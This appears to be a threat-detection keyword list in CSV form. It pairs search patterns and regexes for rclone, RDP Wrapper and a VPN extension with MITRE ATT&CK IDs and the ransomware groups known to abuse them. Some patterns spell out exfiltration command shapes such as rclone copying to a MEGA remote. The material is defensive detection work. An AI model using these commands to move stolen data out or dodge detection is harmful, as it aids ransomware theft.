"*ff6ae27dadc4084ee2632a2ec29ac0662d19acba889943442d2a2cc578926fa6*",".{0,1000}ff6ae27dadc4084ee2632a2ec29ac0662d19acba889943442d2a2cc578926fa6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ffab140a79d06d88ec543509c59850b4b042d8730a6b5ea0c3f592cb20ac242f*",".{0,1000}ffab140a79d06d88ec543509c59850b4b042d8730a6b5ea0c3f592cb20ac242f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ffb178076c942e678405a4d77eefcfcb96b63802b240f2e4e92cde746cbf6d07*",".{0,1000}ffb178076c942e678405a4d77eefcfcb96b63802b240f2e4e92cde746cbf6d07.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ffbfdc45658000d2b762e5b8b0bc0418a4afffeda9a1f9bbcf7438a213ba5326*",".{0,1000}ffbfdc45658000d2b762e5b8b0bc0418a4afffeda9a1f9bbcf7438a213ba5326.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*fff35786bf9ee9320037db69e239df83768b8f756bae2343253ba6512e70d86c*",".{0,1000}fff35786bf9ee9320037db69e239df83768b8f756bae2343253ba6512e70d86c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*file_hash_sha256*",".{0,1000}file_hash_sha256.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*from rclone import *",".{0,1000}from\srclone\simport\s.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*https://rclone.org/install.sh*",".{0,1000}https\:\/\/rclone\.org\/install\.sh.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone  copy *:*",".{0,1000}rclone\scopy\s.{0,1000}\:.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone config*",".{0,1000}rclone\sconfig.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone copy *:*",".{0,1000}rclone\scopy\s.{0,1000}\:.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone copy*",".{0,1000}rclone\scopy.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone obscure*",".{0,1000}rclone\sobscure.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone rcat *",".{0,1000}rclone\srcat\s.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone.exe config create remote mega user *",".{0,1000}rclone\.exe\sconfig\screate\sremote\smega\suser\s.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone.exe config*",".{0,1000}rclone\.exe\sconfig.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone.exe copy*",".{0,1000}rclone\.exe\scopy.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone.exe create*",".{0,1000}rclone\.exe\screate.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone.exe mega*",".{0,1000}rclone\.exe\smega.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone.exe remote*",".{0,1000}rclone\.exe\sremote.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone.exe* copy *:*",".{0,1000}rclone\.exe.{0,1000}\scopy\s.{0,1000}\:.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone.exe* -l * *:*",".{0,1000}rclone\.exe.{0,1000}\s\-l\s.{0,1000}\s.{0,1000}\:.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","interactive mode","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone/imagekit*",".{0,1000}rclone\/imagekit.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#usergagent","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone/rclone*",".{0,1000}rclone\/rclone.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone-beta-latest-windows-amd64.zip*",".{0,1000}rclone\-beta\-latest\-windows\-amd64\.zip.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*rclone-current-windows-arm64.zip*",".{0,1000}rclone\-current\-windows\-arm64\.zip.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","1","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*oifjbnnafapeiknapihcmpeodaeblbkn*",".{0,1000}oifjbnnafapeiknapihcmpeodaeblbkn.{0,1000}","greyware_tool_keyword","rderzh VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* RDPWInst.exe*",".{0,1000}\sRDPWInst\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"* rdpwrap.dll*",".{0,1000}\srdpwrap\.dll.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*""%~dp0RDPWInst"" -i -o*",".{0,1000}\""\%\~dp0RDPWInst\""\s\-i\s\-o.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*%~dp0RDPWInst.exe*",".{0,1000}\%\~dp0RDPWInst\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*/RDPWInst.exe*",".{0,1000}\/RDPWInst\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*/RDPWInst-v*.msi*",".{0,1000}\/RDPWInst\-v.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*/rdpwrap.dll*",".{0,1000}\/rdpwrap\.dll.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*/rdpwrap.git*",".{0,1000}\/rdpwrap\.git.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*/RDPWrap-v*.zip*",".{0,1000}\/RDPWrap\-v.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","1","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*/res/rdpwrap.ini*",".{0,1000}\/res\/rdpwrap\.ini.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\bin\RDPConf.exe*",".{0,1000}\\bin\\RDPConf\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\RDP Wrapper\*",".{0,1000}\\RDP\sWrapper\\.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\RDPCheck.exe*",".{0,1000}\\RDPCheck\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\RDPWInst.exe*",".{0,1000}\\RDPWInst\.exe.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\RDPWInst-v*.msi*",".{0,1000}\\RDPWInst\-v.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\RDPWrap.cpp*",".{0,1000}\\RDPWrap\.cpp.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\rdpwrap.dll*",".{0,1000}\\rdpwrap\.dll.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\rdpwrap.ini*",".{0,1000}\\rdpwrap\.ini.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\RDPWrap.sln*",".{0,1000}\\RDPWrap\.sln.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\rdpwrap.txt*",".{0,1000}\\rdpwrap\.txt.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\rdpwrap-master*",".{0,1000}\\rdpwrap\-master.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\RDPWrapSetup*",".{0,1000}\\RDPWrapSetup.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*\RDPWrap-v*.zip*",".{0,1000}\\RDPWrap\-v.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","N/A","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*1232372059db3ecf28cc2609a36b7f20cef2dfe0618770e3ebaa9488bc7fc2de*",".{0,1000}1232372059db3ecf28cc2609a36b7f20cef2dfe0618770e3ebaa9488bc7fc2de.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*29E4E73B-EBA6-495B-A76C-FBB462196C64*",".{0,1000}29E4E73B\-EBA6\-495B\-A76C\-FBB462196C64.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#GUIDproject","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*35a9481ddbed5177431a9ea4bd09468fe987797d7b1231d64942d17eb54ec269*",".{0,1000}35a9481ddbed5177431a9ea4bd09468fe987797d7b1231d64942d17eb54ec269.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*3699b102bf5ad1120ef560ae3036f27c74f6161b62b31fda8087bd7ae1496ee1*",".{0,1000}3699b102bf5ad1120ef560ae3036f27c74f6161b62b31fda8087bd7ae1496ee1.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
"*9899ffecf141ab4535ec702facbf2b4233903b428b862f3a87e635d09c6244de*",".{0,1000}9899ffecf141ab4535ec702facbf2b4233903b428b862f3a87e635d09c6244de.{0,1000}","greyware_tool_keyword","rdpwrap","RDP Wrapper Library used by malwares","T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/stascorp/rdpwrap","1","0","#filehash","N/A","10","10","14404","3795","2024-06-18T15:08:33Z","2014-10-22T23:18:28Z"
